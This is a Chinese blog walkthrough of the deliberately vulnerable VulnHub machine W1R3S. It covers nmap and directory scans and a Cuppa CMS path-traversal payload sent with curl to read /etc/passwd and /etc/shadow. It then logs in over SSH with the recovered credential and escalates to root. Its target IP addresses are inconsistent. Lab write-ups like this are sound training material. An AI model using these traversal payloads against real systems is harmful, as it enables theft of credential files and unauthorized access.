vulnhub靶机-w1r3s

于 2024-07-17 15:34:11 发布
阅读量447 收藏 11
点赞数 12
分类专栏: 红队 漏洞 渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TZXLzz/article/details/140495914
版权
红队 同时被 3 个专栏收录
2 篇文章 0 订阅
订阅专栏
漏洞
2 篇文章 0 订阅
订阅专栏
渗透测试
2 篇文章 0 订阅
订阅专栏

w1r3s下载地址:https://www.vulnhub.com/entry/w1r3s-101,220/

下载之后导入虚拟机,选择NAT模式自动分配ip

信息收集

查看靶机ip(两种方式都可)

arp-scan -l
nmap -sn 192.168.22.0/24

靶机IP:192.168.22.128

扫描端口

nmap --min-rate 1000 -p- 192.168.80.129

发现靶机开放端口:21,22,80,3306

使用tcp协议详细扫描端口服务

在使用udp扫一次

nmap -sU -p21,22,80,3306 192.168.47.154

使用nmap自带的web漏洞脚本进行扫描

nmap --script=vuln -p21,22,80,3306 192.168.80.129

web渗透

打开web界面,出现apache

dirsearch -u 192.168.22.128   扫描目录(三种都可)
dirb http://192.168.22.128
gobuster dir -u 192.168.22.128 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

爆出两个可疑目录/administrator/wordpress

访问/wordpress,是wordpress框架界面

访问administrator,是一个Cuppa框架

用searchsploit命令查询Cuppa cms是否存在漏洞: searchsploit cuppa cms

发现存在一处漏洞, 漏洞详情保存在25971.txt中, 将其导出来: searchsploit cuppa cms -m 25971.txt

searchsploit cuppa cms -m 25971.txt
​
查看漏洞详情得知, 该cms可通过文件包含漏洞读取任意文件, 我们选取其中一个payload: http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd来试试
​

浏览器访问:http://192.168.47.154/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd, 没有回显, 此处用的是Get请求, 后面尝试下POST请求

还可以使用curl的方式

curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.22.128/administrator/alerts/alertConfigField.php

读取shadow文件

curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.22.128/administrator/alerts/alertConfigField.php

获得passwd和shadow文件内容,root,www-data,w1r3s引起我们注意

curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.22.128/administrator/alerts/alertConfigField.php

w1r3s/computer

ssh远程登陆得到shell

提权

获得了账号w1r3s密码,直接提权成功,获得root权限

TZXLzz
关注
  • 12
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
小白的靶机-VulnHub-W1R3S
wo41ge的博客
12-14 327
靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 目标:得到root权限&找到flag.txt 开机界面 就是个这 确定靶机地址:192.168.120.134 使用namp进行全盘扫面 开放了21,22,80,3306端口 80端口 竟然在 那就上web页面呗 翻了半天 每个锤子东西 使用dirb工具攻击目录 命令:dirb http://192.168.120.134 找到了几个重要的目录,/administrator、/insta
Vulnhub靶机-W1R3S
ergeLXT的博客
06-28 538
Vulnhub靶机W1R3S,超详细过程
Vulnhub靶机w1r3s.v1.0.1-CuppaCMS
过期的秋刀鱼
12-03 962
nmap扫描获得21,22,80,3306端口先看匿名的ftp,然后数据库,Web网站进行80端口的目录爆破,发现CuppaCMS通过漏洞库和浏览器进行了文件包含漏洞利用解密shadow文件,解密了两个用户名,尝试登陆,登陆成功,发现有全部的sudo权限,提权成功最后22端口,原本没有抱多大希望,但是在最后也是成功爆破出密码。
5-VulnHub-W1R3S
尼德霍格007
07-11 253
靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-7-11 信息收集 Nmap ip扫描,确认靶机IP地址 Namp 端口扫描 可以看到开放以下几个端口了 21 FTP协议(可以匿名访问) 22 SSH 80 http 3306 mysql 先访问FTP,匿名访问不需要密码 content目录 一个一个打开看看,在01.txt中获得提示 02.txt ba
W1R3S 1.0.1-vulnhub靶机-渗透测试思路
m0_61361405的博客
09-23 206
vulnhub网站上下载相应的文件,并解压。然后打开VMware,左上角文件→打开,选择解压后的文件夹nmap扫描与分析。
VulnHub-W1R3S: 1.0.1渗透学习
我是小小白的博客
07-09 483
VulnHub-W1R3S: 1.0.1渗透学习 前言 靶机地址:https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip 靶机难度:初级(CTF) 靶机发布日期:2018 年 2 月 5 日 靶机描述:您受雇在 W1R3S.inc 个人服务器上进行渗透测试并报告所有结果。他们要求您获得 root 访问权限并找到标志(位于 /root 目录中); 目标:得到root权限&找到flag.txt 作者:我是小小白 时间:2021-07-09 请注意: 本博客
打靶:vulnhub中的w1R3S
qq_73865998的博客
04-03 1922
复现视频:【「红队笔记」靶机精讲:W1R3S 1.0.1 - 渗透测试思路为王,细节多到即使对于纯萌新也能无感入圈。红队笔记(一个很宝藏的up主)。
vulnhub靶机实战——W1R3S
weixin_30727835的博客
05-13 246
环境 靶机ip:192.168.163.132 攻击机ip:192.168.163.129 目的:拿下靶机并获得root权限 渗透 首先nmap扫描端口 nmap -sC -sV 192.168.163.132 可看到靶机开启了ftp端口21,ssh端口22,http端口80,mysql端口3306。 首先看到了21端口的ftp允许匿名登陆,于是登陆ftp服务器找有...
【渗透测试】VulnHub-W1R3S: 1
m0_52923241的博客
11-06 282
VulnHub-W1R3S: 1VulnHub-W1R3S: 1渗透测试详细流程小知识点必学工具curl:文件传输工具Nikto :web漏洞扫描神器john开膛手:密码破解工具 VulnHub-W1R3S: 1渗透测试详细流程 VulnHub-W1R3S: 1渗透测试详细流程 这台靶机可能是太简单了吧,打的是相当的顺利,相比之前要好很多,时间主要花费在两个小工具的学习上,这俩工具功能强大,但是以前没有接触过。再练~ 基本思路: 还是跟前几台靶机一样,先信息收集,nmap找ip,查端口,web页面查找有用信
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8387
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2022年全国地级市人口分布数据(全新整理)
08-15
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/140877988 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用,经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理 ## 数据指标说明 资源名称:2022年全国地级市人口分布数据 区域范围:全国地级市 数据格式:.shp格式 数据规模:大于2G 数据来源:https://landscan.ornl.gov/
基于SSM++jsp的共享客栈管理系统
08-15
内容概要 共享客栈管理系统基于SSM(Spring、Spring MVC、MyBatis)框架和JSP技术开发,旨在为共享经济模式下的客栈经营者提供高效、便捷的信息管理工具。该系统集成了客栈房间管理、预订管理、入住与退房管理、账单管理以及客户信息管理等核心功能,帮助经营者全面掌控客栈的运营情况。系统支持实时更新客栈的房间状态,并能自动生成统计报表,方便经营者分析运营数据,提升管理效率。同时,系统具备多用户角色管理功能,支持不同权限的用户进行相应的操作,从而保障数据的安全性。 适用人群 本系统主要面向共享客栈经营者、房东、民宿管理公司以及IT技术人员。对于经营者和房东,系统提供了全方位的客栈管理功能,可以有效减少手工管理的工作量,提高运营效率。民宿管理公司可以利用该系统管理旗下多个客栈的日常运营情况,实现集中化管理。而IT技术人员则可以根据系统的架构,进行定制开发,满足特定客栈的个性化需求。此外,该系统也适用于需要系统化管理住宿资源的其他类似小型住宿业者。 使用场景及目标 该系统适用于多种场景,包括客栈日常的房间预订与管理、客户信息记录、账单生成及分析等。在实际使用中,经营者可以通过
JSP-个性化点餐配送系统(源码+数据库+论文).rar
最新发布
08-15
互联网系统平台的广泛应用,改变了人们生活方式的同时也优化提升了人们的生活质量,利用线上系统平台可以实现更加便捷高效的信息获取及在线操作,线上点餐系统的不断普及,让人们体验到了足不出户的点餐服务,利用线上平台信息互通的便捷性实现了商家、客户以及配送员的三方信息互通,借助点餐系统平台可以实现菜品订单信息的添加、在线下单及支付操作以及订单配送员调配。随着餐饮行业的竞争日益激烈,线下的经营模式已经无法满足很多餐厅的经营需求,借助线上系统平台不仅能够拓宽经营渠道同时也为传统的餐饮门店吸引了更多潜在客户。 结合当前餐饮行业的发展现状,本文借助SSM框架实现了点餐配送系统平台的搭建,结合主要用户角色客户、商家、配送员以及系统管理员的功能需求,通过JSP技术的应用实现了前后端的信息共享和动态页面内容呈现,借助点餐配送系统的开发实现了菜品信息管理、客户订单管理、商家配送管理等功能模块的运行,通过点餐配送系统平台的搭建实现了从菜品管理到终端配送的一系列服务内容,结合网络在线订餐系统的发展趋势,优化提升力了点餐的效率及满足更多用户的用餐需求。 关键词:SSM框架;JSP技术;MySQL数据库;点餐配送
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值